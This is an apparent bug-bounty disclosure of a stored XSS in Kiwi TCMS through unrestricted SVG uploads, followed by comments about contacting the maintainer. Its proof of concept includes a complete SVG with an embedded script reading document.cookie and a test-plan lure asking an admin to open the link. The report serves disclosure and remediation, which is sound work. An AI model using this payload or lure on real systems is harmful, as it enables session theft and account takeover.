Stored XSS in kiwiTCMS in kiwitcms/kiwi
Reported on
Nov 23rd 2022
Description
Stored XSS, also known as persistent XSS, is the more damaging of the XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Due to a sanitization problem it is possible to perform a Stored XSS. The problem is that the upload function permit malicious extensions like svg file. Due to this stored xss it is possible to become admin problably, and perform other malicious actions using the api endpoint, I will try later on a local instance and I will let you know.
Not sanitizing extensions could lead to more serious things, such as SSRF or RCE. I didn't test those, stopped as soon as I saw that you could upload SVG files.
Proof of Concept
1 - Upload a malicous svg file and a link to the new file will be generated in the server.
Upload this file (save the file with .svg extension):
<?xml version="1.0" encoding="utf-8"?>
<!-- Svg Vector Icons : http://www.onlinewebfonts.com/icon -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1000 1000" enable-background="new 0 0 1000 1000" xml:space="preserve">
<metadata> Svg Vector Icons : http://www.onlinewebfonts.com/icon </metadata>
<g><g transform="translate(0.000000,511.000000) scale(0.100000,-0.100000)"><path d="M974.7,3376.1c-105.3-28.7-212.5-120.6-260.3-222c-26.8-61.3-30.6-327.3-36.4-2894.1l-3.8-2829H387.1H100v-111v-109.1l250.7-197.1l250.7-195.2H5000h4398.5l250.8,195.2l250.7,197.1v109.1v111h-287.1h-287.1V206.5c0,1965.7-5.7,2802.2-21,2873c-28.7,135.9-139.7,254.6-271.8,294.8c-84.2,24.9-585.7,28.7-4031,26.8C1847.5,3401,1047.5,3395.3,974.7,3376.1z M8985.1,3062.2c21.1-21.1,24.9-553.2,24.9-2823.2v-2798.4l-1560-5.7l-1561.9-3.8l-34.5-67c-21-38.3-68.9-86.1-105.3-111c-67-42.1-78.5-42.1-748.4-42.1c-648.9,0-683.3,1.9-746.5,38.3c-36.4,23-84.2,72.7-105.3,111l-38.3,70.8H2557.7H1003.4l-9.6,61.3c-15.3,80.4-15.3,5443.6-1.9,5514.4c5.7,30.6,28.7,61.3,51.7,70.8c24.9,9.6,1770.5,15.3,3979.3,13.4C8223.3,3087.1,8964,3083.3,8985.1,3062.2z"/><path d="M1296.3,2786.6c-5.7-13.4-7.7-1152.3-5.7-2532.3l5.7-2507.4H5000h3703.7V273.4V2800l-3699.9,5.7C2054.3,2809.6,1302,2805.7,1296.3,2786.6z M5415.4,2269.8c-3.8-13.4-157-409.6-340.7-880.5l-329.2-857.5h-84.2h-82.3l36.4,91.9c19.1,49.8,172.3,446,338.8,880.5l302.4,788.6h84.2C5400,2292.8,5423,2285.1,5415.4,2269.8z M4425.8,1833.4v-76.6l-482.3-241.2l-484.3-241.2l478.5-243.1l478.5-241.2l5.7-80.4c3.8-45.9,0-82.3-5.7-82.3s-266.1,130.2-576.1,290.9l-564.6,289l5.7,68.9l5.7,67l545.5,283.3c300.5,155,557,283.3,570.4,283.3C4416.2,1910,4425.8,1881.3,4425.8,1833.4z M6167.6,1628.6l555.1-283.3v-70.8v-68.9l-562.7-289c-310.1-158.9-570.4-289-576.1-289s-9.6,36.4-5.7,82.3l5.7,80.4l488.1,241.2l488.1,241.2l-491.9,245l-493.8,245v72.7c0,42.1,9.6,74.6,21,74.6C5604.8,1910,5863.2,1783.6,6167.6,1628.6z M4425.8,24.6v-86.1h-488.1h-488.1v86.1v86.1h488.1h488.1V24.6z M5245,30.4l-5.7-82.3l-157-5.7l-158.9-5.8v88.1v86.1H5088h162.7L5245,30.4z M6052.7,24.6v-88.1l-157,5.8l-158.9,5.7l-5.7,82.3l-5.7,80.4h162.7h164.6V24.6z M4100.4-300.8v-86.1H3775h-325.4v86.1v86.1H3775h325.4V-300.8z M5076.6-300.8v-86.1h-325.4h-325.4v86.1v86.1h325.4h325.4V-300.8z M5899.6-300.8v-86.1h-325.4h-325.4v86.1v86.1h325.4h325.4V-300.8z M6875.8-300.8v-86.1h-325.4H6225v86.1v86.1h325.4h325.4V-300.8z M4253.5-654.9v-76.6h-306.3H3641v76.6v76.6h306.2h306.3V-654.9z M4100.4-951.6v-86.1H3775h-325.4v86.1v86.1H3775h325.4V-951.6z M5076.6-951.6v-86.1h-239.3H4598v86.1v86.1h239.3h239.3V-951.6z M5076.6-1276.9v-86.1h-813.5h-813.5v86.1v86.1h813.5h813.5V-1276.9z M6225-1276.9v-86.1h-325.4h-325.4v86.1v86.1h325.4H6225V-1276.9z M5245-1606.2l5.7-82.3H4265h-987.7v72.7c0,40.2,5.7,80.4,13.4,86.1c5.7,7.7,447.9,11.5,980,9.6l968.5-5.7L5245-1606.2z M6550.4-1602.3v-86.1H6225h-325.4v86.1v86.1H6225h325.4V-1602.3z"/></g></g>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
2 - Insert something like that into a Test Plan:
## ADMIN PLEASE OPEN THE LINK
[!link](/uploads/attachments/testplans_testplan/2/Open.svg)
Now when an admin or other users will open the link, the XSS will be triggered.
POC Video:
https://drive.google.com/file/d/18y3-EJZMgpehIZufnlOxf8bqdRY5KK-3/view?usp=share_link
Impact
Stored XSS to run malicious javascript. Probably possibility to become admin and use also other api endpoint without permission.
Occurrences
get.js L205
filter file extensions in file upload
@admin any update? if it needs some tips on how to avoid the file upload vulnerability I can help him in the process
No update but the kiwi team is on the platform. Feel free to reach out to them via other channels (twitter, GH, email)
@admin Could you try to contact the team and see if it is possible to have news? I can't get in touch. In the coming days I would like to analyze the application again if or in any case some other open source framework here on the portal as soon as this vulnerability is resolved, for now I'm dedicating myself to work. I think it's enough to add a strong regex in the name of the uploaded file to solve the problem, and possibly check the type, but if I can't get any feedback from them I can't possibly even help them
Hi Antonio, we have exhausted our outreach efforts to the maintainer, we recommend you try to reach out to the maintainer yourself and try to get their attention to this report. Thanks!
@kiwi @kiwitcms mantainer is it possible to obtain the CVE? It's a stored xss that with the right payload allows an attacker to become the administrator